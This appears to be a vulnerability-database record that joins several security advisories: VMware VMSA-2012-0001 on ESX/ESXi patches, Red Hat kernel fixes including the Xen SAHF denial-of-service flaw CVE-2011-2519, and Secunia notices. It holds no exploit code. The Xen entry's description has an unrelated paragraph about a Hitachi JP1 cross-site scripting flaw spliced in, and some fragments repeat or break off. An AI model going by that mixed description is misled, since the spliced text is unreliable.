http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378
--- COS samba ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694
--- COS python ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521
--- python library ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521
----------------------------------------------------------------------
6. Change log
2012-01-30 VMSA-2012-0001
Initial security advisory in conjunction with the release of patches
for ESX 4.1 and ESXi 4.1 on 2012-01-30.
----------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2012 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8
wj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8
f2pLxi537s+ew4dvnYNWlJ8=
=OAh4
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Alerts when vulnerabilities pose a threat to your infrastructure
The enhanced reporting module of the Secunia Vulnerability Intelligence Manager (VIM) enables you to combine advisory and ticket information, and generate policy compliance statistics. Using your asset list preferences, customised notifications are issued as soon as a new vulnerability is discovered - a valuable tool for documenting mitigation strategies.
Watch our quick solution overview:
http://www.youtube.com/user/Secunia#p/a/u/0/M1Y9sJqR2SY
----------------------------------------------------------------------
TITLE:
Red Hat update for kernel
SECUNIA ADVISORY ID:
SA44792
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44792/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44792
RELEASE DATE:
2011-06-02
DISCUSS ADVISORY:
http://secunia.com/advisories/44792/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/44792/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44792
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Red Hat has issued an update for the kernel.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
ORIGINAL ADVISORY:
RHSA-2011:0833-01:
https://rhn.redhat.com/errata/RHSA-2011-0833.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201312-0004 | CVE-2011-2519 | Xen SAHF Emulation Denial of Service Vulnerability |
CVSS V2: 5.5 CVSS V3: - Severity: MEDIUM |
Xen in the Linux kernel, when running a guest on a host without hardware assisted paging (HAP), allows guest users to cause a denial of service (invalid pointer dereference and hypervisor crash) via the SAHF instruction. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Xen is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the host operating system to consume excessive amounts of resources, denying service to legitimate users. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The following products are affected:
JP1/IT Resource Management - Manager
JP1/IT Service Level Management - Manager.
Certain unspecified input is not properly sanitised before being
returned to the user.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
This update also fixes several bugs. Documentation for these bug fixes will
be available shortly from the Technical Notes document linked to in the
References section. This fixes some
weaknesses and vulnerabilities, which can be exploited by malicious,
local users to disclose certain system information, cause a DoS
(Denial of Service), and gain escalated privileges and by malicious,
local users in a guest virtual machine and malicious people to cause
a DoS.
Successful exploitation of this weakness requires that the host
system is not using hardware assisted paging (HAP).
The Red Hat Security Response Team has rated this update as having
important security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux EUS (v. 5.6 server) - i386, ia64, noarch, ppc, s390x, x86_64
3. Description:
These packages contain the Linux kernel.
This update fixes the following security issues:
* A flaw in the Stream Control Transmission Protocol (SCTP) implementation
could allow a remote attacker to cause a denial of service by sending a
specially-crafted SCTP packet to a target system. (CVE-2011-2482,
Important)
If you do not run applications that use SCTP, you can prevent the sctp
module from being loaded by adding the following to the end of the
"/etc/modprobe.d/blacklist.conf" file:
blacklist sctp
This way, the sctp module cannot be loaded accidentally, which may occur
if an application that requires SCTP is started. A reboot is not necessary
for this change to take effect.
* A flaw in the client-side NFS Lock Manager (NLM) implementation could
allow a local, unprivileged user to cause a denial of service.
(CVE-2011-2491, Important)
* Flaws in the netlink-based wireless configuration interface could allow
a local user, who has the CAP_NET_ADMIN capability, to cause a denial of
service or escalate their privileges on systems that have an active
wireless interface. (CVE-2011-2517, Important)
* A flaw was found in the way the Linux kernel's Xen hypervisor
implementation emulated the SAHF instruction. (CVE-2011-2901, Moderate)
* /proc/[PID]/io is world-readable by default. Previously, these files
could be read without any further restrictions. A local, unprivileged user
could read these files, belonging to other, possibly privileged processes
to gather confidential information, such as the length of a password used
in a process. (CVE-2011-2495, Low)
Red Hat would like to thank Vasily Averin for reporting CVE-2011-2491, and
Vasiliy Kulikov of Openwall for reporting CVE-2011-2495.
This update also fixes the following bugs:
* On Broadcom PCI cards that use the tg3 driver, the operational state of a
network device, represented by the value in
"/sys/class/net/ethX/operstate", was not initialized by default.
Consequently, the state was reported as "unknown" when the tg3 network
device was actually in the "up" state. This update modifies the tg3 driver
to properly set the operstate value. (BZ#744699)
* A KVM (Kernel-based Virtual Machine) guest can get preempted by the host,
when a higher priority process needs to run. When a guest is not running
for several timer interrupts in a row, ticks could be lost, resulting in
the jiffies timer advancing slower than expected and timeouts taking longer
than expected. To correct for the issue of lost ticks,
do_timer_tsc_timekeeping() checks a reference clock source (kvm-clock when
running as a KVM guest) to see if timer interrupts have been missed. If so,
jiffies is incremented by the number of missed timer interrupts, ensuring
that programs are woken up on time. (BZ#747874)
* When a block device object was allocated, the bd_super field was not
being explicitly initialized to NULL. Previously, users of the block device
object could set bd_super to NULL when the object was released by calling
the kill_block_super() function. Certain third-party file systems do not
always use this function, and bd_super could therefore become uninitialized
when the object was allocated again. This could cause a kernel panic in the
blkdev_releasepage() function, when the uninitialized bd_super field was
dereferenced. Now, bd_super is properly initialized in the bdget()
function, and the kernel panic no longer occurs. (BZ#751137)
4. Solution:
Users should upgrade to these updated packages, which contain
backported patches to resolve these issues. The system must be
rebooted for this update to take effect.
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
To install kernel packages manually, use "rpm -ivh [package]". Do not
use "rpm -Uvh" as that will remove the running kernel binaries from
your system. You may use "rpm -e" to remove old kernels after
determining that the new kernel functions properly on your system. Bugs fixed (http://bugzilla.redhat.com/):
709393 - CVE-2011-2491 kernel: rpc task leak after flock()ing NFS share
714867 - CVE-2011-2482 kernel: sctp dos
716825 - CVE-2011-2495 kernel: /proc/PID/io infoleak
718152 - CVE-2011-2517 kernel: nl80211: missing check for valid SSID size in scan operations
718882 - CVE-2011-2519 kernel: xen: x86_emulate: fix SAHF emulation
728042 - CVE-2011-2901 kernel: xen: off-by-one shift in x86_64 __addr_ok()
6. Package List:
Red Hat Enterprise Linux EUS (v. 5.6 server):
Source:
kernel-2.6.18-238.31.1.el5.src.rpm
i386:
kernel-2.6.18-238.31.1.el5.i686.rpm
kernel-PAE-2.6.18-238.31.1.el5.i686.rpm
kernel-PAE-debuginfo-2.6.18-238.31.1.el5.i686.rpm
kernel-PAE-devel-2.6.18-238.31.1.el5.i686.rpm
kernel-debug-2.6.18-238.31.1.el5.i686.rpm
kernel-debug-debuginfo-2.6.18-238.31.1.el5.i686.rpm
kernel-debug-devel-2.6.18-238.31.1.el5.i686.rpm
kernel-debuginfo-2.6.18-238.31.1.el5.i686.rpm
kernel-debuginfo-common-2.6.18-238.31.1.el5.i686.rpm
kernel-devel-2.6.18-238.31.1.el5.i686.rpm
kernel-headers-2.6.18-238.31.1.el5.i386.rpm
kernel-xen-2.6.18-238.31.1.el5.i686.rpm
kernel-xen-debuginfo-2.6.18-238.31.1.el5.i686.rpm
kernel-xen-devel-2.6.18-238.31.1.el5.i686.rpm
ia64:
kernel-2.6.18-238.31.1.el5.ia64.rpm
kernel-debug-2.6.18-238.31.1.el5.ia64.rpm
kernel-debug-debuginfo-2.6.18-238.31.1.el5.ia64.rpm
kernel-debug-devel-2.6.18-238.31.1.el5.ia64.rpm
kernel-debuginfo-2.6.18-238.31.1.el5.ia64.rpm
kernel-debuginfo-common-2.6.18-238.31.1.el5.ia64.rpm
kernel-devel-2.6.18-238.31.1.el5.ia64.rpm
kernel-headers-2.6.18-238.31.1.el5.ia64.rpm
kernel-xen-2.6.18-238.31.1.el5.ia64.rpm
kernel-xen-debuginfo-2.6.18-238.31.1.el5.ia64.rpm
kernel-xen-devel-2.6.18-238.31.1.el5.ia64.rpm
noarch:
kernel-doc-2.6.18-238.31.1.el5.noarch.rpm
ppc:
kernel-2.6.18-238.31.1.el5.ppc64.rpm
kernel-debug-2.6.18-238.31.1.el5.ppc64.rpm
kernel-debug-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm
kernel-debug-devel-2.6.18-238.31.1.el5.ppc64.rpm
kernel-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm
kernel-debuginfo-common-2.6.18-238.31.1.el5.ppc64.rpm
kernel-devel-2.6.18-238.31.1.el5.ppc64.rpm
kernel-headers-2.6.18-238.31.1.el5.ppc.rpm
kernel-headers-2.6.18-238.31.1.el5.ppc64.rpm
kernel-kdump-2.6.18-238.31.1.el5.ppc64.rpm
kernel-kdump-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm
kernel-kdump-devel-2.6.18-238.31.1.el5.ppc64.rpm
s390x:
kernel-2.6.18-238.31.1.el5.s390x.rpm
kernel-debug-2.6.18-238.31.1.el5.s390x.rpm
kernel-debug-debuginfo-2.6.18-238.31.1.el5.s390x.rpm
kernel-debug-devel-2.6.18-238.31.1.el5.s390x.rpm
kernel-debuginfo-2.6.18-238.31.1.el5.s390x.rpm
kernel-debuginfo-common-2.6.18-238.31.1.el5.s390x.rpm
kernel-devel-2.6.18-238.31.1.el5.s390x.rpm
kernel-headers-2.6.18-238.31.1.el5.s390x.rpm
kernel-kdump-2.6.18-238.31.1.el5.s390x.rpm
kernel-kdump-debuginfo-2.6.18-238.31.1.el5.s390x.rpm
kernel-kdump-devel-2.6.18-238.31.1.el5.s390x.rpm
x86_64:
kernel-2.6.18-238.31.1.el5.x86_64.rpm
kernel-debug-2.6.18-238.31.1.el5.x86_64.rpm
kernel-debug-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm
kernel-debug-devel-2.6.18-238.31.1.el5.x86_64.rpm
kernel-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm
kernel-debuginfo-common-2.6.18-238.31.1.el5.x86_64.rpm
kernel-devel-2.6.18-238.31.1.el5.x86_64.rpm
kernel-headers-2.6.18-238.31.1.el5.x86_64.rpm
kernel-xen-2.6.18-238.31.1.el5.x86_64.rpm
kernel-xen-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm
kernel-xen-devel-2.6.18-238.31.1.el5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2482.html
https://www.redhat.com/security/data/cve/CVE-2011-2491.html
https://www.redhat.com/security/data/cve/CVE-2011-2495.html
https://www.redhat.com/security/data/cve/CVE-2011-2517.html
https://www.redhat.com/security/data/cve/CVE-2011-2519.html
https://www.redhat.com/security/data/cve/CVE-2011-2901.html
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
----------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2012-0001
Synopsis: VMware ESXi and ESX updates to third party library
and ESX Service Console
Issue date: 2012-01-30
Updated on: 2012-01-30 (initial advisory)
CVE numbers: --- COS Kernel ---
CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,
CVE-2011-1080, CVE-2011-1093, CVE-2011-1163,
CVE-2011-1166, CVE-2011-1170, CVE-2011-1171,
CVE-2011-1172, CVE-2011-1494, CVE-2011-1495,
CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,
CVE-2011-0695, CVE-2011-0711, CVE-2011-1044,
CVE-2011-1182, CVE-2011-1573, CVE-2011-1576,
CVE-2011-1593, CVE-2011-1745, CVE-2011-1746,
CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,
CVE-2011-2213, CVE-2011-2492, CVE-2011-1780,
CVE-2011-2525, CVE-2011-2689, CVE-2011-2482,
CVE-2011-2491, CVE-2011-2495, CVE-2011-2517,
CVE-2011-2519, CVE-2011-2901
--- COS cURL ---
CVE-2011-2192
--- COS rpm ---
CVE-2010-2059, CVE-2011-3378
--- COS samba ---
CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,
CVE-2011-2522, CVE-2011-2694
--- COS python ---
CVE-2009-3720, CVE-2010-3493, CVE-2011-1015,
CVE-2011-1521
--- python library ---
CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,
CVE-2010-2089, CVE-2011-1521
----------------------------------------------------------------------
1. Summary
VMware ESXi and ESX updates to third party library and ESX Service
Console address several security issues.
2. Relevant releases
ESXi 4.1 without patch ESXi410-201201401-SG
ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG,
ESX410-201201404-SG, ESX410-201201405-SG,
ESX410-201201406-SG, ESX410-201201407-SG
3. Problem Description
a. ESX third party update for Service Console kernel
The ESX Service Console Operating System (COS) kernel is updated to
kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the
COS kernel.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,
CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166,
CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494,
CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,
CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182,
CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745,
CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,
CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525,
CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495,
CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201401-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
b. ESX third party update for Service Console cURL RPM
The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9
resolving a security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2011-2192 to this issue.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201402-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
c. ESX third party update for Service Console nspr and nss RPMs
The ESX Service Console (COS) nspr and nss RPMs are updated to
nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving
a security issues.
A Certificate Authority (CA) issued fraudulent SSL certificates and
Netscape Portable Runtime (NSPR) and Network Security Services (NSS)
contain the built-in tokens of this fraudulent Certificate
Authority. This update renders all SSL certificates signed by the
fraudulent CA as untrusted for all uses.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201404-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
d. ESX third party update for Service Console rpm RPMs
The ESX Service Console Operating System (COS) rpm packages are
updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,
rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2
which fixes multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2010-2059 and CVE-2011-3378 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201406-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
e. ESX third party update for Service Console samba RPMs
The ESX Service Console Operating System (COS) samba packages are
updated to samba-client-3.0.33-3.29.el5_7.4,
samba-common-3.0.33-3.29.el5_7.4 and
libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security
issues in the Samba client.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,
CVE-2011-2522 and CVE-2011-2694 to these issues.
Note that ESX does not include the Samba Web Administration Tool
(SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and
CVE-2011-2694.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201407-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
f. ESX third party update for Service Console python package
The ESX Service Console (COS) python package is updated to
2.4.3-44 which fixes multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2009-3720, CVE-2010-3493, CVE-2011-1015 and
CVE-2011-1521 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201405-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
g. ESXi update to third party component python
The python third party library is updated to python 2.5.6 which
fixes multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,
CVE-2010-2089, and CVE-2011-1521 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi 5.0 ESXi patch pending
ESXi 4.1 ESXi ESXi410-201201401-SG
ESXi 4.0 ESXi patch pending
ESXi 3.5 ESXi patch pending
ESX 4.1 ESX not affected
ESX 4.0 ESX not affected
ESX 3.5 ESX not affected
* hosted products are VMware Workstation, Player, ACE, Fusion.
4. Solution
Please review the patch/release notes for your product and version
and verify the checksum of your downloaded file.
VMware ESXi 4.1
---------------
ESXi410-201201401
http://downloads.vmware.com/go/selfsupport-download
md5sum: BDF86F10A973346E26C9C2CD4C424E88
sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F
http://kb.vmware.com/kb/2009143
ESXi410-201201401 contains ESXi410-201201401-SG
VMware ESX 4.1
--------------
ESX410-201201001
http://downloads.vmware.com/go/selfsupport-download
md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F
sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC
http://kb.vmware.com/kb/2009142
ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG,
ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and
ESX410-201201407-SG
5. References
CVE numbers
--- COS Kernel ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901
--- COS cURL ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192
--- COS rpm ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378
--- COS samba ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694
--- COS python ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521
--- python library ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521
----------------------------------------------------------------------
6. Change log
2012-01-30 VMSA-2012-0001
Initial security advisory in conjunction with the release of patches
for ESX 4.1 and ESXi 4.1 on 2012-01-30.
----------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2012 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8
wj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8
f2pLxi537s+ew4dvnYNWlJ8=
=OAh4
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
The new Secunia Corporate Software Inspector (CSI) 5.0
Integrates with Microsoft WSUS & SCCM and supports Apple Mac OS X.
Get a free trial now and qualify for a special discount:
http://secunia.com/vulnerability_scanning/corporate/trial/
----------------------------------------------------------------------
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA46308
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46308/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46308
RELEASE DATE:
2011-10-06
DISCUSS ADVISORY:
http://secunia.com/advisories/46308/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46308/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
